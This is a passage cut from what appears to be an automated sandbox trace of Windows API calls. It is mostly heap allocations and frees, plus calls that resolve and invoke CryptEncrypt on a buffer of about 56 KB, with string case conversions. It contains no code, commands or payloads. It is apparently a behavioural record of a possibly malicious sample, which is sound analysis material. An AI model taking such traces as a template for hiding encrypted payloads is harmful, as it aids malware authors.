hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0160.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa640, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.913] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0160.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6b20 [0160.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0160.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0160.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0160.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0160.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0161.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0161.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0161.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0161.010] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xdc6b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xdc70) returned 1 [0161.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0161.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0161.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0161.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0161.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0161.015] CharLowerBuffW (in: lpsz="byte[56432]", cchLength=0xb | out: lpsz="byte[56432]") returned 0xb [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0161.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.017] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.017] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.017] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.017] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.017] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.017] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0161.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.018] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34bfec8*, pdwDataLen=0x8bef68*=0xdc6b, dwBufLen=0xdc70 | out: pbData=0x34bfec8*, pdwDataLen=0x8bef68*=0xdc70) returned 1 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0161.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0161.021] CharUpperBuffW (in: 